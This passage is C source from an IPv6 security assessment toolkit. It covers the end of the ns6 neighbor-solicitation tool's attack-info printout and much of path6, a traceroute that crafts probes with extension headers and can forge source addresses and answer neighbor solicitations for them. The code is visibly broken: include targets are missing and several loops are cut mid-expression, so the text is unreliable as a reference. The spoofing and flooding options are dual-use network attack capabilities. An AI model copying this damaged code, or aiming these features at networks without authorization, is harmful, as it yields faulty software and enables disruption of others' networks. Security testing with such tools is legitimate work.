((!idata->hdstaddr_f)?" (all-nodes multicast)":"")); if(inet_ntop(AF_INET6, &(idata->srcaddr), psrcaddr, sizeof(psrcaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); exit(EXIT_FAILURE); } if(!floods_f){ printf("IPv6 Source Address: %s%s\n", psrcaddr, ((!idata->srcaddr_f)?" (randomized)":"")); } else{ printf("IPv6 Source Address: randomized, from the %s/%u prefix%s\n", psrcaddr, idata->srcpreflen, \ (!idata->srcprefix_f)?" (default)":""); } if(inet_ntop(AF_INET6, &(idata->dstaddr), pdstaddr, sizeof(pdstaddr)) == NULL){ puts("Error converting IPv6 Destination Address to presentation format"); exit(EXIT_FAILURE); } printf("IPv6 Destination Address: %s%s\n", pdstaddr, \ ((!idata->dstaddr_f)?" (all-nodes link-local multicast)":"")); printf("IPv6 Hop Limit: %u%s\n", hoplimit, (hoplimit_f)?"":" (default)"); for(i=0; ifragh_f) printf("Sending each packet in fragments of %u bytes (plus the Unfragmentable part)\n", nfrags); if(!floodt_f){ if(targetaddr_f){ if(inet_ntop(AF_INET6, &targetaddr, pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting ND IPv6 Target Address to presentation format"); exit(EXIT_FAILURE); } printf("ND Target Address: %s\n", pv6addr); } } else{ if(inet_ntop(AF_INET6, &targetaddr, pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting ND IPv6 Target Address to presentation format"); exit(EXIT_FAILURE); } printf("ND Target Address: randomized, from the %s/%u prefix%s\n", pv6addr, targetpreflen,\ (!targetprefix_f)?" (default)":""); } for(i=0;i Address: %s\n", \ ((floods_f && !sllopta_f)?"(randomized for each packet)":plinkaddr)); } } ipv6toolkit-2.0+ds.1/tools/ns6.h000066400000000000000000000000541254360455000164300ustar00rootroot00000000000000/* * Header file for the ns6 tool * */ ipv6toolkit-2.0+ds.1/tools/path6.c000066400000000000000000001515111254360455000167440ustar00rootroot00000000000000/* * path6: A versatile IPv6 traceroute * * Copyright (C) 2011-2015 Fernando Gont (fgont@si6networks.com) * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see . * * * Build with: make path6 * * It requires that the libpcap library be installed on your system. * * Please send any bug reports to Fernando Gont */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "path6.h" #include "ipv6toolkit.h" #include "libipv6.h" /* Function prototypes */ void init_packet_data(struct iface_data *); int send_probe(struct iface_data *, unsigned int, unsigned char, unsigned char); void print_attack_info(struct iface_data *); void print_help(void); void usage(void); /* Used for router discovery */ struct iface_data idata; struct in6_addr randprefix; unsigned char randpreflen; /* Data structures for packets read from the wire */ struct pcap_pkthdr *pkthdr; const u_char *pktdata; unsigned char *pkt_end, *pkt_ptr; struct ether_header *pkt_ether; struct ip6_hdr *pkt_ipv6; struct ip6_frag *pkt_fh; struct icmp6_hdr *pkt_icmp6; struct tcp_hdr *pkt_tcp; struct udp_hdr *pkt_udp; struct ah_hdr *pkt_ah; struct esp_hdr *pkt_esp; struct ip6_eh *pkt_eh; struct nd_neighbor_solicit *pkt_ns; struct in6_addr *pkt_ipv6addr; unsigned int pktbytes; unsigned int rhbytes, rhleft; bpf_u_int32 my_netmask; bpf_u_int32 my_ip; struct bpf_program pcap_filter; char dev[64], errbuf[PCAP_ERRBUF_SIZE]; unsigned char buffer[65556], buffrh[MIN_IPV6_HLEN + MIN_TCP_HLEN]; unsigned char *v6buffer, *ptr, *startofprefixes; char *pref; struct ip6_hdr *ipv6; struct icmp6_hdr *icmp6; struct ether_header *ethernet; struct dlt_null *dlt_null; #if defined(__linux__) struct sll_linux *sll_linux; #endif struct nd_opt_tlla *tllaopt; char *lasts, *rpref; char *charptr; size_t nw; unsigned long ul_res, ul_val; unsigned int i, j, startrand; unsigned int skip; unsigned int frags, nfrags; uint16_t mask, ip6length; uint8_t hoplimit; char plinkaddr[ETHER_ADDR_PLEN]; char psrcaddr[INET6_ADDRSTRLEN], pdstaddr[INET6_ADDRSTRLEN], pv6addr[INET6_ADDRSTRLEN]; unsigned char verbose_f=0, numeric_f= TRUE; unsigned char loop_f=0, localaddr_f=0, probe_f=0; unsigned char srcprefix_f=0, hoplimit_f=0, ip6length_f=0, icmp6psize_f=0, send_f=0, end_f=0, delayp_f=0; /* Support for Extension Headers */ unsigned int dstopthdrs, dstoptuhdrs, hbhopthdrs; char hbhopthdr_f=0, dstoptuhdr_f=0, dstopthdr_f=0; unsigned char *dstopthdr[MAX_DST_OPT_HDR], *dstoptuhdr[MAX_DST_OPT_U_HDR]; unsigned char *hbhopthdr[MAX_HBH_OPT_HDR]; unsigned int dstopthdrlen[MAX_DST_OPT_HDR], dstoptuhdrlen[MAX_DST_OPT_U_HDR]; unsigned int hbhopthdrlen[MAX_HBH_OPT_HDR], m, pad; struct ip6_frag *fh, fraghdr; struct ip6_hdr *fipv6; unsigned char fragbuffer[ETHER_HDR_LEN+MIN_IPV6_HLEN+MAX_IPV6_PAYLOAD]; unsigned char *fragpart, *fptr, *fptrend, *ptrend, *ptrhdr, *ptrhdrend; unsigned int hdrlen, ndstopthdr=0, nhbhopthdr=0, ndstoptuhdr=0; unsigned int nfrags, fragsize; unsigned char *prev_nh, *startoffragment; /* Parameters for the probe packets */ unsigned char probetype=PROBE_ICMP6_ECHO; unsigned char dstport_f=0, tcpflags_f=0, pps_f=0, bps_f=0, endhost_f=0, rhbytes_f=0, droppacket_f=FALSE; uint16_t dstport; uint8_t tcpflags=0, cprobe, pprobe, nprobe, maxprobes, chop, phop, nhop, maxhops; struct in6_addr nsrc; uint32_t tcpseq, spi; #define MAXHOPS 30 #define MAXPROBES 3 struct probe test[MAXHOPS][MAXPROBES]; unsigned long pktinterval, rate; unsigned int packetsize; char line[LINE_BUFFER_SIZE]; int main(int argc, char **argv){ extern char *optarg; fd_set sset, rset; int r, sel; struct timeval curtime, start, lastprobe, sched, timeout; uint8_t ulhtype; struct target_ipv6 targetipv6; static struct option longopts[] = { {"interface", required_argument, 0, 'i'}, {"link-src-addr", required_argument, 0, 'S'}, {"link-dst-addr", required_argument, 0, 'D'}, {"src-address", required_argument, 0, 's'}, {"dst-address", required_argument, 0, 'd'}, {"dst-opt-hdr", required_argument, 0, 'u'}, {"dst-opt-u-hdr", required_argument, 0, 'U'}, {"hbh-opt-hdr", required_argument, 0, 'H'}, {"frag-hdr", required_argument, 0, 'y'}, {"numeric", no_argument, 0, 'n'}, {"probe-type", required_argument, 0, 'p'}, {"payload-size", required_argument, 0, 'P'}, {"dst-port", required_argument, 0, 'a'}, {"tcp-flags", required_argument, 0, 'X'}, {"rate-limit", required_argument, 0, 'r'}, {"verbose", no_argument, 0, 'v'}, {"help", no_argument, 0, 'h'}, {0, 0, 0, 0} }; char shortopts[]= "i:S:D:s:d:u:U:H:y:np:P:a:X:r:vh"; char option; if(argc<=1){ usage(); exit(EXIT_FAILURE); } srandom(time(NULL)); hoplimit=64+random()%180; init_iface_data(&idata); while((r=getopt_long(argc, argv, shortopts, longopts, NULL)) != -1) { option= r; switch(option) { case 'i': /* Interface */ strncpy(idata.iface, optarg, IFACE_LENGTH-1); idata.iface[IFACE_LENGTH-1]=0; idata.ifindex= if_nametoindex(idata.iface); idata.iface_f=TRUE; break; case 's': /* IPv6 Source Address */ if((charptr = strtok_r(optarg, "/", &lasts)) == NULL){ puts("Error in Source Address"); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, charptr, &(idata.srcaddr)) <= 0){ puts("inet_pton(): Source Address not valid"); exit(EXIT_FAILURE); } idata.srcaddr_f = 1; if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ idata.srcpreflen = atoi(charptr); if(idata.srcpreflen>128){ puts("Prefix length error in IPv6 Source Address"); exit(EXIT_FAILURE); } sanitize_ipv6_prefix(&(idata.srcaddr), idata.srcpreflen); idata.srcprefix_f=1; } break; case 'd': /* IPv6 Destination Address */ strncpy( targetipv6.name, optarg, NI_MAXHOST); targetipv6.name[NI_MAXHOST-1]= 0; targetipv6.flags= AI_CANONNAME; if( (r=get_ipv6_target(&targetipv6)) != 0){ if(r < 0){ printf("Unknown Destination: %s\n", gai_strerror(targetipv6.res)); } else{ puts("Unknown Destination: No IPv6 address found for specified destination"); } exit(1); } idata.dstaddr= targetipv6.ip6; idata.dstaddr_f = 1; break; case 'u': /* Destinations Options Header */ if(ndstopthdr >= MAX_DST_OPT_HDR){ puts("Too many Destination Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstopthdrlen[ndstopthdr]= hdrlen; if( (dstopthdr[ndstopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header"); exit(EXIT_FAILURE); } ptrhdr= dstopthdr[ndstopthdr] + 2; ptrhdrend= dstopthdr[ndstopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr= ptrhdr + pad; } *(dstopthdr[ndstopthdr]+1)= (hdrlen/8)-1; ndstopthdr++; dstopthdr_f=1; break; case 'U': /* Destination Options Header (Unfragmentable Part) */ if(ndstoptuhdr >= MAX_DST_OPT_U_HDR){ puts("Too many Destination Options Headers (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstoptuhdrlen[ndstoptuhdr]= hdrlen; if( (dstoptuhdr[ndstoptuhdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } ptrhdr= dstoptuhdr[ndstoptuhdr]+2; ptrhdrend= dstoptuhdr[ndstoptuhdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header (Unfragmentable Part) Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(dstoptuhdr[ndstoptuhdr]+1)= (hdrlen/8) - 1; ndstoptuhdr++; dstoptuhdr_f=1; break; case 'H': /* Hop-by-Hop Options Header */ if(nhbhopthdr >= MAX_HBH_OPT_HDR){ puts("Too many Hop-by-Hop Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; hbhopthdrlen[nhbhopthdr]= hdrlen; if( (hbhopthdr[nhbhopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } ptrhdr= hbhopthdr[nhbhopthdr] + 2; ptrhdrend= hbhopthdr[nhbhopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Hop-by-Hop Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(hbhopthdr[nhbhopthdr]+1)= (hdrlen/8) - 1; nhbhopthdr++; hbhopthdr_f=1; break; case 'y': /* Fragment header */ nfrags= atoi(optarg); if(nfrags < 8){ puts("Error in Fragmentation option: Fragment Size must be at least 8 bytes"); exit(EXIT_FAILURE); } nfrags = (nfrags +7) & 0xfff8; idata.fragh_f=TRUE; break; case 'n': /* Print IPv6 addresses ratther than hostnames */ numeric_f=TRUE; break; case 'S': /* Source Ethernet address */ if(ether_pton(optarg, &(idata.hsrcaddr), sizeof(idata.hsrcaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } idata.hsrcaddr_f = 1; break; case 'D': /* Destination Ethernet Address */ if(ether_pton(optarg, &(idata.hdstaddr), sizeof(idata.hdstaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } idata.hdstaddr_f = 1; break; case 'p': /* Probe type */ if(strncmp(optarg, "echo", strlen("echo")) == 0 || strncmp(optarg, "icmp", strlen("icmp")) == 0){ probetype= PROBE_ICMP6_ECHO; probe_f=TRUE; } else if(strncmp(optarg, "udp", strlen("udp")) == 0){ probetype= PROBE_UDP; probe_f=TRUE; } else if(strncmp(optarg, "tcp", strlen("tcp")) == 0){ probetype= PROBE_TCP; probe_f=TRUE; } else if(strncmp(optarg, "esp", strlen("ESP")) == 0){ probetype= PROBE_ESP; probe_f=TRUE; } else if(strncmp(optarg, "ah", strlen("AH")) == 0){ probetype= PROBE_AH; probe_f=TRUE; } else{ puts("Error in '-p' option: Unknown probe type"); exit(EXIT_FAILURE); } break; case 'P': /* Payload Size*/ rhbytes= atoi(optarg); rhbytes_f= 1; break; case 'a': /* TCP/UDP Destination Port */ dstport= atoi(optarg); dstport_f=TRUE; break; case 'X': if(strncmp(optarg, "no", 2) == 0 || strncmp(optarg, "noflags", 7)){ tcpflags_f=1; break; } charptr = optarg; while(*charptr){ switch(*charptr){ case 'F': tcpflags= tcpflags | TH_FIN; break; case 'S': tcpflags= tcpflags | TH_SYN; break; case 'R': tcpflags= tcpflags | TH_RST; break; case 'P': tcpflags= tcpflags | TH_PUSH; break; case 'A': tcpflags= tcpflags | TH_ACK; break; case 'U': tcpflags= tcpflags | TH_URG; break; case 'X': /* No TCP flags */ break; default: printf("Unknown TCP flag '%c'\n", *charptr); exit(EXIT_FAILURE); break; } if(*charptr == 'X') break; charptr++; } tcpflags_f=TRUE; break; case 'r': if( Strnlen(optarg, LINE_BUFFER_SIZE-1) >= (LINE_BUFFER_SIZE-1)){ puts("scan6: -r option is too long"); exit(EXIT_FAILURE); } sscanf(optarg, "%lu%s", &rate, line); line[LINE_BUFFER_SIZE-1]=0; if(strncmp(line, "pps", 3) == 0) pps_f=TRUE; else if(strncmp(line, "bps", 3) == 0) bps_f=TRUE; else{ puts("scan6: Unknown unit of for the rate limit ('-r' option). Unit should be 'bps' or 'pps'"); exit(EXIT_FAILURE); } break; case 'v': /* Be verbose */ idata.verbose_f++; break; case 'h': /* Help */ print_help(); exit(EXIT_FAILURE); break; default: usage(); exit(EXIT_FAILURE); break; } /* switch */ } /* while(getopt) */ verbose_f= idata.verbose_f; if(geteuid()) { puts("path6 needs root privileges to run."); exit(EXIT_FAILURE); } if(!idata.dstaddr_f){ puts("Error: Must specify Destination System"); exit(EXIT_FAILURE); } if(!idata.iface_f){ if(idata.dstaddr_f && IN6_IS_ADDR_LINKLOCAL(&(idata.dstaddr))){ puts("Must specify a network interface for link-local destinations"); exit(EXIT_FAILURE); } } if(load_dst_and_pcap(&idata, LOAD_SRC_NXT_HOP) == FAILURE){ puts("Error while learning Souce Address and Next Hop"); exit(EXIT_FAILURE); } release_privileges(); if((idata.ip6_local_flag && idata.ip6_global_flag) && !idata.srcaddr_f) localaddr_f=1; if(!probe_f) probetype= PROBE_ICMP6_ECHO; if(probetype == PROBE_TCP){ if(!dstport_f) dstport= 80; if(!tcpflags_f) tcpflags= TH_SYN; tcpseq=random() & 0x7fffffff; } else if(probetype == PROBE_UDP){ if(!dstport_f) dstport= 60000 + random() % 5000; } else if(probetype == PROBE_ESP || probetype == PROBE_AH){ spi= random(); } if(pps_f){ if(rate < 1) rate=1; pktinterval= 1000000/rate; } if(bps_f){ switch(probetype){ case PROBE_ICMP6_ECHO: packetsize= MIN_IPV6_HLEN + MIN_DST_OPT_HDR_SIZE + sizeof(struct icmp6_hdr); break; case PROBE_TCP: packetsize= MIN_IPV6_HLEN + sizeof(struct tcp_hdr); break; case PROBE_ESP: packetsize= MIN_IPV6_HLEN + sizeof(struct esp_hdr); break; case PROBE_AH: packetsize= MIN_IPV6_HLEN + sizeof(struct ah_hdr); break; } if(rate == 0 || ((packetsize * 8)/rate) <= 0) pktinterval= 1000000; else pktinterval= ((packetsize * 8)/rate) * 1000000; } /* We Default to 1000 pps */ if(!pps_f && !bps_f) pktinterval= 1000; if(inet_ntop(AF_INET6, &(idata.dstaddr), pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); exit(EXIT_FAILURE); } if(idata.verbose_f){ print_attack_info(&idata); } printf("Tracing path to %s (%s)...\n\n", targetipv6.name, pv6addr); /* Set initial contents of the attack packet */ init_packet_data(&idata); /* Set filter for receiving IPv6 packets XXX: This filter should probably be refined */ if(pcap_compile(idata.pfd, &pcap_filter, PCAP_IPV6_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ printf("pcap_compile(): %s\n", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } if(pcap_setfilter(idata.pfd, &pcap_filter) == -1){ printf("pcap_setfilter(): %s\n", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } pcap_freecode(&pcap_filter); maxhops=MAXHOPS; maxprobes=MAXPROBES; /* Initialize the table of results for the different tests */ memset(test, 0, sizeof(test)); FD_ZERO(&sset); FD_SET(idata.fd, &sset); /* Next probe to be printed out */ phop=0; pprobe=0; /* Next probe to be sent */ chop=0; cprobe=0; if(gettimeofday(&start, NULL) == -1){ if(idata.verbose_f) perror("path6"); exit(EXIT_FAILURE); } /* PROBE_TIMEOUT is in seconds */ sched.tv_sec= PROBE_TIMEOUT; sched.tv_usec= 0; lastprobe= timeval_sub(&start, &sched); end_f=0; while(!end_f){ if(gettimeofday(&curtime, NULL) == -1){ if(idata.verbose_f) perror("path6"); exit(EXIT_FAILURE); } /* If the next probe to be printed out has been sent, evaluate whether it is time to print out the result. */ if(phop < maxhops && pprobe < maxprobes && test[phop][pprobe].sent){ /* If a response was received, print the RTT. */ if(test[phop][pprobe].received){ /* If this is the first "response" for this probe, print the IPv6 address and the reverse domain name. */ if(inet_ntop(AF_INET6, &(test[phop][pprobe].srcaddr), psrcaddr, sizeof(psrcaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); exit(EXIT_FAILURE); } if(delayp_f){ if(numeric_f){ printf(" %2d (%s)", phop+1, psrcaddr); } else{ } for(i=0; i= maxprobes){ puts(""); pprobe=0; phop++; if(phop >= maxhops) end_f=1; } fflush(stdout); } else if(is_time_elapsed(&curtime, &(test[phop][pprobe].ststamp), PROBE_TIMEOUT * 1000000)){ /* If there was a probe timeout, we allow to send another probe */ send_f=1; /* If more than probe_timeout seconds have elapsed, consider the probe lost. Print an asterisk, and wait for the next probe. */ if(pprobe == 0 || delayp_f){ pprobe++; if(pprobe >= maxprobes){ printf(" %2d () * * *\n", phop+1); fflush(stdout); pprobe=0; phop++; if(phop >= maxhops) end_f=1; delayp_f=0; } else{ delayp_f=1; } } else{ printf(" *"); pprobe++; if(pprobe >= maxprobes){ puts(""); pprobe=0; phop++; if(phop >= maxhops) end_f=1; } fflush(stdout); } } } /* If there is a probe to be sent, and rate-limiting allows, send the probe */ while( (send_f || is_time_elapsed(&curtime, &lastprobe, pktinterval)) && chop < maxhops && cprobe < maxprobes){ if(gettimeofday(&curtime, NULL) == -1){ if(idata.verbose_f) perror("path6"); exit(EXIT_FAILURE); } test[chop][cprobe].sent= TRUE; test[chop][cprobe].ststamp= curtime; lastprobe= curtime; if(send_probe(&idata, probetype, chop, cprobe) == -1){ puts("path6: Error while sending probe packet"); exit(1); } send_f=0; cprobe++; if(cprobe >= maxprobes){ cprobe=0; chop++; } } /* XXX: This should be improved. Essentially, select() might sleep for at most one second (if no packets are received). Then a bunch of probe packets might be sent out all at once. */ rset= sset; timeout.tv_sec= pktinterval / 1000000 ; timeout.tv_usec= pktinterval % 1000000; /* Since we cannot count on the pcap_socket being readable, we should wait the smaller of 10ms or the packet rate "timeout" */ #if defined(sun) || defined(__sun) || defined(__linux__) if(timeout.tv_sec || timeout.tv_usec > 10000){ timeout.tv_sec= 0; timeout.tv_usec= 10000; } #endif if((sel=select(idata.fd+1, &rset, NULL, NULL, &timeout)) == -1){ if(errno == EINTR){ continue; } else{ puts("Error in select()"); exit(EXIT_FAILURE); } } #if defined(sun) || defined(__sun) || defined(__linux__) if(TRUE){ #else if(FD_ISSET(idata.fd, &rset)){ #endif /* Read a packet (Echo Reply, ICMPv6 Error, or Neighbor Solicitation) */ if((r=pcap_next_ex(idata.pfd, &pkthdr, &pktdata)) == -1){ printf("pcap_next_ex(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } else if(r == 1 && pktdata != NULL){ pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata.linkhsize); pkt_end = (unsigned char *) pktdata + pkthdr->caplen; if( (pkt_end - pktdata) < (idata.linkhsize + MIN_IPV6_HLEN)) continue; /* We currently handle two cases: In the first case, there are extension headers, and hence we need to walk through the extension header chain. In the other, the upper layer protocol is right after the fixed IPv6 header */ if(pkt_ipv6->ip6_nxt != IPPROTO_ICMPV6 && pkt_ipv6->ip6_nxt != IPPROTO_TCP && pkt_ipv6->ip6_nxt != IPPROTO_UDP && \ pkt_ipv6->ip6_nxt != IPPROTO_ESP && pkt_ipv6->ip6_nxt != IPPROTO_AH){ pkt_eh= (struct ip6_eh *) ((char *) pkt_ipv6 + sizeof(struct ip6_hdr)); while( ( (unsigned char *) pkt_eh + MIN_EXT_HLEN) <= pkt_end && (pkt_eh->eh_nxt != IPPROTO_ICMPV6 && \ pkt_eh->eh_nxt != IPPROTO_TCP && pkt_eh->eh_nxt != IPPROTO_UDP && \ pkt_ipv6->ip6_nxt != IPPROTO_ESP && pkt_ipv6->ip6_nxt != IPPROTO_AH)){ pkt_eh= (struct ip6_eh *) ( (char *) pkt_eh + (pkt_eh->eh_len + 1) * 8); } if( (unsigned char *)pkt_eh >= pkt_end){ continue; } else{ ulhtype= pkt_eh->eh_nxt; pkt_icmp6= (struct icmp6_hdr *) ( (char *) pkt_eh + (pkt_eh->eh_len + 1) * 8); pkt_udp= (struct udp_hdr *) ( (char *) pkt_eh + (pkt_eh->eh_len + 1) * 8); pkt_icmp6 = (struct icmp6_hdr *) ( (char *) pkt_eh + (pkt_eh->eh_len + 1) * 8); pkt_tcp = (struct tcp_hdr *) ( (char *) pkt_eh + (pkt_eh->eh_len + 1) * 8); pkt_ah= (struct ah_hdr *) ( (char *) pkt_eh + (pkt_eh->eh_len + 1) * 8); pkt_esp= (struct esp_hdr *) ( (char *) pkt_eh + (pkt_eh->eh_len + 1) * 8); pkt_ns= (struct nd_neighbor_solicit *) ( (char *) pkt_eh + (pkt_eh->eh_len + 1) * 8); } } else{ ulhtype= pkt_ipv6->ip6_nxt; pkt_icmp6 = (struct icmp6_hdr *) ((char *) pkt_ipv6 + sizeof(struct ip6_hdr)); pkt_ns= (struct nd_neighbor_solicit *) pkt_icmp6; pkt_tcp= (struct tcp_hdr *) pkt_icmp6; pkt_ah= (struct ah_hdr *) ((char *) pkt_ipv6 + sizeof(struct ip6_hdr)); pkt_esp= (struct esp_hdr *) ((char *) pkt_ipv6 + sizeof(struct ip6_hdr)); pkt_udp= (struct udp_hdr *) pkt_icmp6; } /* At this point, we have skipped IPv6 EHs if there were any, and pkt_* pointers are set accordingly. */ /* XXX: We employ the ts member (struct timeval) in struct pcap_pkthdr. That way we do not need to hurry up to process the received packets, and can e.g. do DNS resolutions without screwing up the measured RTTs. */ /* Specific case to handle port unreachables for UDP */ if(ulhtype == IPPROTO_ICMPV6 && probetype == PROBE_UDP && pkt_icmp6->icmp6_type == ICMP6_DST_UNREACH && \ pkt_icmp6->icmp6_code == ICMP6_DST_UNREACH_NOPORT){ nsrc= pkt_ipv6->ip6_src; pkt_ipv6= (struct ip6_hdr *) ((char *) pkt_icmp6 + sizeof(struct icmp6_hdr)); if( ((unsigned char *)pkt_ipv6 + sizeof(struct ip6_hdr)) > pkt_end) continue; /* XXX: Should remove the check for TCP -- only UDP can get here */ /* Here we walk the embedded packet, which could contain EHs */ if(pkt_ipv6->ip6_nxt != IPPROTO_ICMPV6 && pkt_ipv6->ip6_nxt != IPPROTO_TCP && pkt_ipv6->ip6_nxt != IPPROTO_UDP){ pkt_eh= (struct ip6_eh *) ((char *) pkt_ipv6 + sizeof(struct ip6_hdr)); while( ( (unsigned char *)pkt_eh+ MIN_EXT_HLEN) <= pkt_end && pkt_eh->eh_nxt != IPPROTO_ICMPV6 && \ pkt_eh->eh_nxt != IPPROTO_TCP && pkt_eh->eh_nxt != IPPROTO_UDP){ pkt_eh= (struct ip6_eh *) ( (char *) pkt_eh + (pkt_eh->eh_len + 1) * 8); } if( (unsigned char *)pkt_eh >= pkt_end){ continue; } else{ ulhtype= pkt_eh->eh_nxt; pkt_icmp6= (struct icmp6_hdr *) ( (char *) pkt_eh + (pkt_eh->eh_len + 1) * 8); pkt_udp= (struct udp_hdr *) ( (char *) pkt_eh + (pkt_eh->eh_len + 1) * 8); pkt_icmp6 = (struct icmp6_hdr *) ( (char *) pkt_eh + (pkt_eh->eh_len + 1) * 8); } } else{ ulhtype= pkt_ipv6->ip6_nxt; pkt_icmp6 = (struct icmp6_hdr *) ((char *) pkt_ipv6 + sizeof(struct ip6_hdr)); pkt_tcp= (struct tcp_hdr *) pkt_icmp6; pkt_udp= (struct udp_hdr *) pkt_icmp6; } if(probetype == PROBE_UDP && ulhtype == IPPROTO_UDP){ /* Must still verify the UDP checksum */ if( (pkt_end - (unsigned char *) pkt_udp) < sizeof(struct udp_hdr)){ #ifdef DEBUG puts("Descarte port tamanio leido menor a UDP header"); #endif continue; } if(ntohs(pkt_udp->uh_ulen) < sizeof(struct udp_hdr)){ #ifdef DEBUG puts("Descarte port tamanio declarado menor a UDP header"); #endif continue; } if(ntohs(pkt_udp->uh_dport) != dstport){ #ifdef DEBUG puts("Descarte por puerto destino distinto"); printf("Puerto destino p: %u, P dest mio: %u\n", ntohs(pkt_udp->uh_dport), dstport); #endif continue; } nhop= (ntohs(pkt_udp->uh_sport) >> 8) - PROBE_PORT_OFFSET; nprobe= ntohs(pkt_udp->uh_sport) & 0xff; endhost_f=1; #ifdef DEBUG puts("Port unreachable valido"); printf("nhop: %u nprobe: %u\n", nhop, nprobe); #endif } else{ continue; } } /* We received an ICMPv6 echo response or an ICMPv6 error */ else if(ulhtype == IPPROTO_ICMPV6){ if(idata.type == DLT_EN10MB && !(idata.flags & IFACE_LOOPBACK) && pkt_icmp6->icmp6_type == ND_NEIGHBOR_SOLICIT){ if( (pkt_end - (unsigned char *) pkt_ns) < sizeof(struct nd_neighbor_solicit)) continue; /* If the addresses that we're using are not actually configured on the local system (i.e., they are "spoofed", we must check whether it is a Neighbor Solicitation for one of our addresses, and respond with a Neighbor Advertisement. Otherwise, the kernel will take care of that. */ if(idata.type == DLT_EN10MB && !(idata.flags & IFACE_LOOPBACK) && !localaddr_f && \ is_eq_in6_addr(&(pkt_ns->nd_ns_target), &idata.srcaddr)){ if(send_neighbor_advert(&idata, idata.pfd, pktdata) == -1){ puts("Error sending Neighbor Advertisement"); exit(EXIT_FAILURE); } } continue; } else if( probetype == PROBE_ICMP6_ECHO && (pkt_icmp6->icmp6_type == ICMP6_ECHO_REPLY)){ /* Process the ICMPv6 Echo Reply */ if( (pkt_end - (unsigned char *) pkt_icmp6) < sizeof(struct icmp6_hdr)) continue; if(ntohs(pkt_icmp6->icmp6_data16[0]) != getpid() ) continue; nhop= ntohs(pkt_icmp6->icmp6_data16[1]) >> 8; nprobe= ntohs(pkt_icmp6->icmp6_data16[1]) & 0xff; if(nhop >= maxhops) continue; if(!is_eq_in6_addr(&(pkt_ipv6->ip6_src), &(idata.dstaddr))) continue; nsrc= pkt_ipv6->ip6_src; endhost_f=1; } else if(pkt_icmp6->icmp6_type == ICMP6_TIME_EXCEEDED && pkt_icmp6->icmp6_code == ICMP6_TIME_EXCEED_TRANSIT){ /* Process the ICMPv6 Error message */ /* Record the source address of the error message */ nsrc= pkt_ipv6->ip6_src; if(inet_ntop(AF_INET6, &(nsrc), psrcaddr, sizeof(psrcaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); exit(EXIT_FAILURE); } pkt_ipv6= (struct ip6_hdr *) ((char *) pkt_icmp6 + sizeof(struct icmp6_hdr)); if( ((unsigned char *)pkt_ipv6 + sizeof(struct ip6_hdr)) > pkt_end) continue; if(!is_eq_in6_addr(&(pkt_ipv6->ip6_dst), &(idata.dstaddr))) continue; ulhtype= pkt_ipv6->ip6_nxt; pkt_eh= (struct ip6_eh *) ((char *) pkt_ipv6 + sizeof(struct ip6_hdr)); droppacket_f= FALSE; /* If he embedded packet contains EHs, we need to skip the EHs to get to the upper layer protocol */ while(ulhtype != IPPROTO_ICMPV6 && ulhtype != IPPROTO_TCP && ulhtype != IPPROTO_UDP && \ ulhtype != IPPROTO_ESP && ulhtype != IPPROTO_AH && !droppacket_f){ if(ulhtype == IPPROTO_FRAGMENT){ if( ((unsigned char *)pkt_eh + sizeof(struct ip6_frag)) > pkt_end){ droppacket_f= TRUE; break; } fh= (struct ip6_frag *) ((char *) pkt_eh); if(fh->ip6f_offlg & IP6F_OFF_MASK){ 